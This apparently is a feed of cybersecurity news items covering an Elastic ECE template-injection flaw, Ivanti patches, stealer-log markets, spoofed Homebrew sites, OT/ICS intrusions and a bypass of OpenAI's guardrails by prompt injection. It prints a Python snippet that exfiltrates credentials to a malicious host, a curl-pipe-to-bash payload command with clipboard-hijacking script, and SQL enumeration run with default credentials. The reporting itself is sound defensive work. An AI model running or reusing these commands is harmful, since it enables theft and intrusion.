• Elastic has disclosed a critical vulnerability in its Elastic Cloud Enterprise (ECE) platform that allows administrators with malicious intent to execute arbitrary commands and exfiltrate sensitive data.

    Tracked as CVE-2025-37729 under advisory ESA-2025-21, the flaw stems from improper neutralization of special elements in the Jinjava template engine.

    This issue affects multiple versions of ECE, potentially exposing enterprise environments to severe risks if exploited by insiders or compromised admin accounts.

    The vulnerability arises when specially crafted strings containing Jinjava variables are evaluated during the processing of deployment plans in the ECE admin console.

    Attackers with admin privileges can inject malicious payloads into these plans, leading to code execution. The results of such executions can then be read back through ingested logs, enabling data theft or further system compromise.

    Elastic emphasizes that exploitation requires access to the admin console and a deployment with the Logging+Metrics feature enabled, narrowing the threat vector to privileged users but amplifying the impact in shared or multi-tenant setups.

    Elastic Cloud Enterprise Vulnerability

    This flaw impacts ECE versions from 2.5.0 up to and including 3.8.1, as well as versions 4.0.0 through 4.0.1.

    Organizations running these builds in production face heightened exposure, particularly those leveraging ECE for scalable cloud management in logging and metrics workloads.

    The CVSS v3.1 score of 9.1 underscores its criticality, with a vector of AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H, indicating network accessibility, low complexity, high privileges required, but scope change enabling high confidentiality, integrity, and availability impacts.

    While no proof-of-concept exploits have been publicly released, the advisory details how attackers could craft payloads like those mimicking interpreter commands.

    For instance, injecting strings that evaluate Jinjava expressions could trigger remote code execution, similar to template injection attacks seen in other platforms.

    Elastic notes that the issue does not affect standalone Elastic Stack components but is specific to ECE’s enterprise deployment orchestration.

    Mitigations

    Elastic urges immediate upgrades to patched versions 3.8.2 or 4.0.2, which address the neutralization flaw in the template engine.

    For those unable to patch promptly, no direct workarounds exist, though organizations can limit admin console access through strict role-based controls and monitoring.

    To detect potential exploitation, Elastic recommends scanning request logs with the query: (payload.name : int3rpr3t3r or payload.name : forPath). This can flag suspicious activity indicative of injected payloads.

    Indicator of CompromiseDescriptionDetection Method
    payload.name : int3rpr3t3rMalicious payload mimicking interpreter commandsLog search in ECE console
    payload.name : forPathInjection targeting path evaluation in templatesLog search in ECE console

    As enterprises increasingly rely on ECE for hybrid cloud observability, this vulnerability highlights the need for vigilant privilege management.

    Elastic’s rapid disclosure allows proactive defense, but delayed patching could invite insider threats or lateral movement in breached networks.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Elastic Cloud Enterprise Vulnerability Let Attackers Execute Malicious Commands appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ivanti has disclosed 13 vulnerabilities in Ivanti Endpoint Manager (EPM), including two high-severity issues that could enable privilege escalation and remote code execution, and eleven medium-severity SQL injection flaws. While there is no evidence of in-the-wild exploitation, Ivanti urges customers to move to the latest supported release and apply recommended mitigations as patches are still […]

    The post Ivanti Patches 13 Endpoint Manager Flaws Allowing Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • As cybercrime continues to evolve, new adversaries and innovative tactics challenge defenders daily. The recently emerged threat group TA585 exemplifies this shift, deploying sophisticated malware campaigns that highlight the changing nature of the cybercrime landscape. TA585’s operational strategy, infrastructure control, and malware preferences set it apart—particularly in its use of the advanced MonsterV2 malware. TA585 […]

    The post TA585 Deploys Novel Web-Injection to Deliver MonsterV2 Malware on Windows appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new evolution is underway in the Russian cybercrime ecosystem: market operators and threat actors are rapidly shifting from selling compromised Remote Desktop Protocol (RDP) access to trading malware stealer logs for unauthorized system entry.

    This transition marks a significant change in both tactics and impact within the underground forums, affecting organizations and individuals worldwide.

    Historically, RDP access sales dominated Russian cybercrime marketplaces, granting threat actors direct entry into corporate and government networks. However, the emergence of advanced stealer malware—such as RedLine, Raccoon, and Vidar—has transformed illicit trading.

    Instead of selling static credentials, criminals now collect and broker “logs”: raw output from malware infections containing browser-saved passwords, cookies, autofill data, crypto wallet details, and session tokens.

    List of bots for sale on Russian Market (Source – Rapid7)

    These leaked logs allow opportunistic access to targeted environments, sometimes with greater reach and stealth than traditional RDP sales.

    Rapid7 researchers observed this shift, highlighting how stealer-log packs frequently appear on prominent Russian forums—often bundled with automated scripts to facilitate credential extraction and exploitation.

    This paradigm empowers attackers to bypass network-level controls and immediately impersonate victims in varied platforms, ramping up the risk for quick account takeover and data theft.

    Most common infostealers used by Russian Market sellers since 2021 (Source – Rapid7)

    The scale and automation found within stealer log trading deeply challenges conventional security measures: as soon as the logs are posted, a wide array of criminals races to monetize or further weaponize the data.

    Infection Mechanism

    Modern stealer malware operates with remarkable efficiency. Once deployed—typically via phishing campaigns, poisoned software downloads, or malicious ads—the executable promptly scans for stored credentials, cookies, and wallets across browsers and desktop applications.

    During its runtime, the stealer utilizes process injection and API calls (notably, accessing browser SQLite databases and reading credential stores).

    A typical exfiltration code block includes:-

    import requests
    log_data = collect_credentials()
    requests.post('http://malicious.ru/upload', data=log_data)

    Persistence tactics are minimal—attackers focus on short-lived infection and swift extraction, sometimes removing the malware after log harvesting to evade detection.

    By the time the compromised user’s security tools identify the stealer, credentials have often already been posted to forums, making account recovery difficult.

    Cyber defenders must pivot toward real-time log monitoring, multi-factor authentication, and rapid incident response to counteract this versatile and scalable model embraced by Russian cybercriminals.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Russian Cybercrime Market Hub Transferring from RDP Access to Malware Stealer Logs to Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Elastic has released a critical security update for Elastic Cloud Enterprise (ECE) addressing a template engine injection flaw that could allow attackers with admin privileges to execute arbitrary commands and exfiltrate sensitive data. Tracked as CVE-2025-37729 and rated CVSS 9.1 (Critical), the issue affects ECE versions 2.5.0 through 3.8.1 and 4.0.0 through 4.0.1. Users are […]

    The post Elastic Cloud Enterprise Flaw Lets Attackers Run Malicious Commands appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A significant data exposure incident has affected the cloud-based invoicing platform Invoicely, potentially compromising sensitive information belonging to customers worldwide. The exposed database contained 178,519 files in various formats including Excel spreadsheets, CSV files, PDFs, and images. Most concerning was the complete lack of security measures – the database was neither password-protected nor encrypted, making […]

    The post 178,000+ Invoices Expose Customer Data from Invoicely Platform appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated campaign targeting macOS users has emerged through spoofed Homebrew installer websites that deliver malicious payloads alongside legitimate package manager installations.

    The attack exploits the widespread trust users place in the popular Homebrew package manager by creating pixel-perfect replicas of the official brew[.]sh installation page, complete with deceptive clipboard manipulation techniques.

    Security researchers have identified multiple fraudulent domains mimicking the legitimate Homebrew website, including homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.

    These malicious sites present convincing replicas of the official installation interface but incorporate hidden JavaScript designed to inject additional commands into users’ clipboards without their knowledge.

    Unlike authentic Homebrew pages that allow manual text selection, these spoofed versions force users to utilize a designated Copy button, enabling attackers to insert malicious payloads alongside standard installation commands.

    Homebrew install page (Source – The Sequence)

    The campaign represents a significant evolution in supply chain attacks, targeting not the package repositories themselves but the initial installation process.

    While Homebrew has maintained a strong security track record with no recent compromises, threat actors have discovered an effective workaround by impersonating the trusted installation source.

    Spoofed Homebrew install page (Source – The Sequence)

    The Sequence analysts identified this emerging threat pattern through systematic monitoring of suspicious domains and infrastructure associated with known malware distribution networks.

    The attack methodology demonstrates remarkable sophistication in its execution and evasion capabilities.

    Rather than compromising legitimate package repositories, attackers have developed a parallel infrastructure that intercepts users during the critical installation phase.

    This approach bypasses traditional security measures focused on repository monitoring while exploiting the inherent trust users place in familiar installation procedures.

    Advanced Clipboard Manipulation Techniques

    The core infection mechanism relies on JavaScript-based clipboard manipulation that operates transparently to the victim.

    When users click the Copy button on spoofed sites, embedded code executes a series of operations designed to inject malicious commands alongside the expected Homebrew installation script.

    The JavaScript implementation includes Russian-language comments explicitly indicating where malicious commands should be inserted, suggesting a commodity-style threat service.

    The malicious script prevents standard text selection through event listeners that disable contextmenu, selectstart, copy, cut, and dragstart operations on the installation block.

    This forces victims to use the provided Copy button, which triggers the copyInstallCommand() function. The function writes a predetermined command to the clipboard using either the modern Clipboard API or fallback textarea methods for compatibility across different browser environments.

    const copyCommand = 'echo '; // ← замени на нужную
    async function copyInstallCommand () {
        await navigator[.]clipboard[.]writeText (copyCommand);
        fetch ('notify[.]php', {
            method: 'POST',
            headers: { 'Content-Type': 'application / json' },
            body: JSON[.]stringify ({ event: 'copy_install_command', time: new Date () })
        });
    }

    Analysis revealed that active campaigns utilize commands such as curl - s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & which downloads and executes additional payloads in the background while the legitimate Homebrew installation proceeds normally, creating an effective dual-execution scenario that maintains operational stealth while establishing persistent access to compromised systems.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers have shed light on a previously undocumented threat actor called TA585 that has been observed delivering an off-the-shelf malware called MonsterV2 via phishing campaigns. The Proofpoint Threat Research Team described the threat activity cluster as sophisticated, leveraging web injections and filtering checks as part of its attack chains. “TA585 is notable because it

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers have discovered a fundamental vulnerability in OpenAI’s newly released Guardrails framework that can be exploited using basic prompt injection techniques. The vulnerability enables attackers to circumvent the system’s safety mechanisms and generate malicious content without triggering any security alerts, raising serious concerns about the effectiveness of AI self-regulation approaches. Critical Flaw in LLM-Based […]

    The post Simple Prompt Injection Lets Hackers Bypass OpenAI Guardrails Framework appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly identified pro-Russian hacktivist group has successfully infiltrated operational technology and industrial control systems belonging to critical infrastructure organizations, employing sophisticated techniques to steal login credentials and disrupt vital services.

    The threat actor, known as TwoNet, represents an emerging class of hacktivists who have expanded beyond traditional distributed denial-of-service attacks to target human-machine interfaces and programmable logic controllers in water treatment facilities, solar installations, and other industrial environments.

    The group’s attack methodology demonstrates a concerning evolution in hacktivist capabilities, moving from simple website defacements to complex manipulation of industrial processes.

    TwoNet’s operations have been observed across multiple European countries, with particular focus on utilities and energy infrastructure in nations they consider adversarial.

    Their activities include database enumeration, system defacement, process disruption, and credential harvesting from internet-exposed OT/ICS devices.

    Forescout analysts identified the malware and attack patterns through sophisticated honeypot operations designed to attract and monitor threat actors targeting critical infrastructure.

    The research team’s water treatment facility honeypot successfully captured TwoNet’s intrusion methodology, providing unprecedented visibility into the group’s tactics, techniques, and procedures.

    This intelligence gathering effort revealed not only the specific attack vectors employed but also the broader ecosystem of affiliated hacktivist groups operating in coordination.

    Threat Actor Network and Affiliations (Source – Forescout)

    The attackers demonstrated particular expertise in exploiting default authentication mechanisms, utilizing SQL injection techniques, and leveraging known vulnerabilities in human-machine interface systems.

    Their operations span multiple industrial protocols including Modbus and S7 communications, indicating sophisticated knowledge of operational technology environments.

    The group’s ability to maintain persistence across multiple login sessions and systematically alter critical system configurations represents a significant escalation in hacktivist threat capabilities.

    Advanced Database Exploitation and System Manipulation Techniques

    The intrusion methodology employed by TwoNet reveals sophisticated database enumeration capabilities that extend far beyond typical hacktivist operations.

    The attackers initiated their assault by logging into the human-machine interface using default credentials (admin/admin), immediately proceeding to execute complex SQL queries designed to extract comprehensive schema information from the target system.

    The group’s initial database reconnaissance involved executing sophisticated queries through the sql.shtm page, beginning with failed attempts using primary key enumeration commands.

    When these initial queries failed, the attackers demonstrated remarkable persistence by modifying their approach and successfully extracting detailed table structures using alternative SQL syntax:-

    SELECT t.TABLENAME, c.COLUMNNAME, c.COLUMNNUMBER, c.COLUMNDATATYPE,
    c.COLUMNDEFAULT, c.AUTOINCREMENTVALUE, c.AUTOINCREMENTSTART,
    c.AUTOINCREMENTINC
    FROM sys.systables t
    JOIN sys.syscolumns c ON t.TABLEID = c.REFERENCEID
    WHERE t.tabletype = 'T'
    ORDER BY t.TABLENAME, c.COLUMNNUMBER

    Following successful database enumeration, the attackers created a new user account named “BARLATI” and maintained access across multiple sessions spanning nearly 24 hours.

    Their systematic approach included exploiting CVE-2021-26829 to inject malicious JavaScript code into the HMI login page, creating persistent defacement that would trigger alerts whenever administrators accessed the system.

    The attackers also demonstrated advanced operational security by modifying system settings to disable logging and alarm mechanisms, effectively blinding security monitoring systems to their ongoing activities.

    The sophistication of these database manipulation techniques, combined with the group’s ability to maintain operational security while conducting multi-stage attacks, indicates access to advanced tooling and significant operational experience that extends beyond typical hacktivist capabilities.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Pro-Russian Hacktivist Attacking OT/ICS Devices to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶